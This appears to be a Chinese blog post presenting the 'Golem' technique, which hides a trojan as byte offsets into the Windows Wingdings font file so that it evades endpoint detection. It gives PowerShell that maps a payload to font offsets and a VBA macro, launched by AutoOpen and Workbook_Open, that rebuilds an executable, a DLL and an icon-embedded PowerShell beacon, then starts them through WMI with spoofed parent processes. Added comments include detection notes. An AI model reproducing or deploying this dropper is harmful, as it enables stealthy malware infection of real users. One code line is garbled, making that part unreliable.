Golem恶意软件 – 隐藏在Windows字体文件夹中的恶意软件

传统APT攻击的资料外传过程,离不开相应木马的配合.(限定词:传统)

但是,john doe 老哥有言,成也萧何败也萧何,被反制的点也往往体现在木马的相关属性中:

  1. 字符串相关的代码风格聚类识别.
  2. CC回连地址的大网记录抽取.

本文描述了这样一种可能:

  1. 只借由目标操作系统的正常功能实现一款木马.
  2. 木马连一个bit的恶意代码也没有,完完全全就是白的,能过任何终端检测产品的查杀.
  3. 木马执行过程中也不需要额外再下载其他恶意代码.

实现上述3种限定条件制作木马的过程如下:

1.2 步骤

  1. 准备一个各版本操作系统都有的字体文件,比如wingding.ttf.
  2. 准备你的payload.(这个payload当然只在你的机器上).
  3. 关键一步: 找出你的payload的每一个字节在wingding.ttf中的位置.(落地在受害者系统上的只是位置信息,所以当然是白的能过查杀了)
  4. 在受害者系统上根据位置信息重组出木马,构建后执行.

1.3 代码

1.3.1 从字体文件挑出payload位置

# Offset-mapping stage (the page says this runs on the author's machine, not
# on the target): for every byte of $Malware, record the 0-based index of the
# first byte in $Font that has the same value. Only offsets are produced;
# the font file itself is an unmodified system file.
$Font = "C:\Windows\Fonts\wingding.ttf"
$Malware = "C:\Users\Administrator\Pictures\2.PNG"

# -Encoding Byte with -ReadCount 0 reads each file as one whole byte array.
$fontArray = Get-Content $Font -Encoding Byte -ReadCount 0
$malwareArray = Get-Content $Malware -Encoding Byte -ReadCount 0
$offsetArray = @()
foreach ($byteInMalware in $malwareArray){
    $index = 0
    # Linear scan from the start of the font for each payload byte; the first
    # match wins, so equal byte values always map to the same offset.
    foreach ($byteInFont in $fontArray) {
	if ($byteInMalware -eq $byteInFont) {
	    $offsetArray += $index
	    break
	}
	$index++
    }    
}

1.3.2 生成位置信息

# Code-generation stage: turns $offsetArray (from 1.3.1) into VBA source text.
# Each generated `Function cccN()` returns an Array(...) of offsets.
#   $i counts offsets since the last line break; at 30 the current offset is
#      emitted followed by VBA's " _" line continuation.
#   $j counts continuation lines; at 25 the accumulated text is wrapped into
#      one Function and $u (the function number) advances.
# Splitting the literal this way presumably keeps each generated function
# within VBA's line-length / line-count limits — TODO confirm.
$i=0
$payload = ""
$j=0
$u=1
$payDef = ""
foreach($offset in $offsetArray){  

    if($i -eq 30) {
	$payload = $payload + ", " + $offset + " _`r`n"
	$i=0       
	$j++ 
    }
    else {
       if($i -eq 0) {
	$payload = $payload + $offset       
       }
       else {
	$payload = $payload + ", " + $offset       
       }
    }
    # Flush the current chunk into a VBA Function once 25 lines are collected.
    if($j -eq 25)  {
	$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
	$payload = ""
	$u++
	$j = 0
    }
    $i++
}
# Emit the trailing partial chunk, if any, as the last Function.
if($payload -ne ""){
$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
}
# Writes the generated VBA text to the pipeline / console.
$payDef

1.3.3 运行起来

[...] --> your array of bytes containing the position of the necessary bytes in the Wingdings font.


'example to join the bytes for the first malicious component


    ' Fragment of the reconstruction Sub; its header and the generated
    ' offset functions it depends on are elided above by "[...]".
    ' t1..t18 each receive one chunk of offsets. cc1..cc18 are presumably the
    ' generated Array-returning functions from 1.3.2 (which names them cccN,
    ' so the naming differs — verify against the real generated output).
    t1 = cc1
    t2 = cc2
    t3 = cc3
    t4 = cc4
    t5 = cc5
    t6 = cc6
    t7 = cc7
    t8 = cc8
    t9 = cc9
    t10 = cc10
    t11 = cc11
    t12 = cc12
    t13 = cc13
    t14 = cc14
    t15 = cc15
    t16 = cc16
    t17 = cc17
    t18 = cc18

    ' Join the 18 chunks into one comma-separated string, then Split it back
    ' into a single array (ttt) of positions in the font file.
    ttt = Split(Join(t1, ",") & "," & Join(t2, ",") & "," & Join(t3, ",") & "," & Join(t4, ",") & "," & Join(t5, ",") & "," & Join(t6, ",") & "," & Join(t7, ",") & "," & Join(t8, ",") & "," & Join(t9, ",") _
     & "," & Join(t10, ",") & "," & Join(t11, ",") & "," & Join(t12, ",") & "," & Join(t13, ",") & "," & Join(t14, ",") & "," & Join(t15, ",") & "," & Join(t16, ",") & "," & Join(t17, ",") & "," & Join(t18, ","), ",")



[...]



    ' Remainder of the reconstruction Sub (its start is elided by "[...]").
    ' Three offset arrays are consumed: ttt, tt and ttttttt, one per file
    ' written below. nb3, off, sFilename2 and sFilename3 are never declared,
    ' so this presumably relies on the module not using Option Explicit.
    Dim nb As Integer
    Dim nb2 As Integer
    nb = UBound(ttt) - LBound(ttt) + 1 'ttt is a joined byte array
    nb2 = UBound(tt) - LBound(tt) + 1
    nb3 = UBound(ttttttt) - LBound(ttttttt) + 1
    Dim intFileNumber As Integer
    Dim i As Integer
    Dim j As Integer
    Dim lngFileSize As Long
    Dim lngFileSize2 As Long
    Dim strBuffer As String
    Dim strBuffer2 As String
    Dim lngCharNumber As Long
    Dim lngCharNumber2 As Long
    Dim strCharacter As String * 1
    Dim strCharacter2 As String * 1
    Dim strFileName As String
    Dim strFileName2 As String
    Dim offset() As Variant

    ' Read the whole system font into strBuffer with a single binary Get.
    strFileName = "C:\Windows\Fonts\wingding.ttf"
    intFileNumber = FreeFile
    Open strFileName For Binary Access Read Shared As #intFileNumber
	lngFileSize = LOF(intFileNumber)
	strBuffer = Space$(lngFileSize)
	Get #intFileNumber, , strBuffer
    Close #intFileNumber

   Dim nFileNum As Long
   Dim sFilename As String
   Dim ind As Long
   ' Detection note: an Office host writing an .exe, a .dll and an .ico into
   ' C:\Users\Public\Documents, byte by byte, is the on-disk observable of this
   ' stage; the files are assembled from font bytes, not downloaded.
   sFilename2 = "C:\Users\Public\Documents\changeMyParent.exe" ' crafted binary that will be use to select the parent of rundll32
   sFilename = "C:\Users\Public\Documents\runPoshCode.dll" ' .DLL that will run powershell beacon from an image
   sFilename3 = "C:\Users\Public\Documents\BEACON.ico" ' malicious powershell beacon registered in an .ICO
   nFileNum = FreeFile
   ' a loop would be better 😉
   ' Each loop below copies one character per offset: ind is the 1-based Put
   ' position in the output file, off the position passed to Mid (also 1-based).
   Open sFilename2 For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb - 1
	ind = lngCharNumber + 1
	off = ttt(lngCharNumber)
	strCharacter = Mid(strBuffer, off, 1)
	Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum

   nFileNum = FreeFile
   Open sFilename For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb2 - 1
	ind = lngCharNumber + 1
	off = tt(lngCharNumber)
	strCharacter = Mid(strBuffer, off, 1)
	Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum

   nFileNum = FreeFile
   Open sFilename3 For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb3 - 1
	ind = lngCharNumber + 1
	off = ttttttt(lngCharNumber)
	strCharacter = Mid(strBuffer, off, 1)
	Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum
   ' Hand off to the launch stage once all three files exist.
   rr
End Sub

' Launch stage: looks up explorer.exe's PID through WMI, then asks WMI
' (Win32_Process.Create) to start the reconstructed helper with a rundll32
' command line. Detection note: a process created via Win32_Process.Create
' typically does not appear as a direct child of the Office host, and the
' helper's stated purpose (see the sFilename2 comment above) is to choose
' rundll32's parent — so correlate WMI process-creation events and rundll32
' launches with the Office host and with the file writes under
' C:\Users\Public\Documents rather than relying on the parent link alone.
Sub rr()
  Dim xx As String
  Dim oihfasf As Object, eopuf As Object, kdj As Object
  Dim oDic As Object, a() As Variant
  Dim pskaf As Integer

  ' oDic and a() are created/declared but never used in this Sub.
  Set oDic = CreateObject("Scripting.Dictionary")

  xx = "." ' "." = local machine in the winmgmts moniker

  Set oihfasf = GetObject("winmgmts:\\" _
      & xx & "\root\CIMV2")
  Set eopuf = oihfasf.ExecQuery _
      ("Select Name, ProcessID FROM Win32_Process", , 48)

  ' Enumerate all processes and keep the ProcessID of explorer.exe; there is
  ' no Exit For, so with several matches the last one enumerated is kept.
  For Each kdj In eopuf
      If (kdj.Properties_("Name").Value) = "explorer.exe" Then
	  pskaf = (kdj.Properties_("ProcessID").Value)
      End If
  Next
' t, cnt and arr are declared but never used.
Dim t As Date

Dim cnt As Long
Dim arr(2) As Byte

' xl is the full command line handed to WMI: the helper, a quoted rundll32
' command line as its argument, then the explorer PID.
' NOTE(review): the next line looks garbled by page extraction — the tail
' `& pskafxx = "."` reads as `& pskaf` fused with a separate `xx = "."`
' statement; left as found.
Dim xl As String
xl = "C:\Users\Public\Documents\changeMyParent.exe ""C:\Windows\system32\RunDll32.exe C:\Users\Public\Documents\runPoshCode.dll,ComputeFmMediaType -f C:\Users\Public\Documents\BEACON.ico"" " & pskafxx = "."
' ow/os/oc/op/aslh are undeclared; presumably no Option Explicit in this module.
Set ow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")
Set os = ow.Get("Win32_ProcessStartup")
Set oc = os.SpawnInstance_
Set op = GetObject("winmgmts:\\" & xx & "\root\cimv2:Win32_Process")
' Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation,
' ProcessId): aslh receives the new PID but is never read.
op.Create xl, Null, oc, aslh

End Sub
' Word auto-execution macro: runs when the document is opened (if macros are
' enabled) and starts the reconstruction routine cc. This is the initial
' trigger for everything above.
Sub AutoOpen()
    cc
End Sub
' Excel counterpart of AutoOpen. Workbook_Open is the ThisWorkbook event
' handler; in a standard module this name presumably does not fire on its
' own — confirm where the macro is placed in the real document.
Sub Workbook_Open()
    cc
End Sub

报告链接:http://sysadminconcombre.blogspot.com/2018/11/golem-malware-malware-hiding-in-your.html
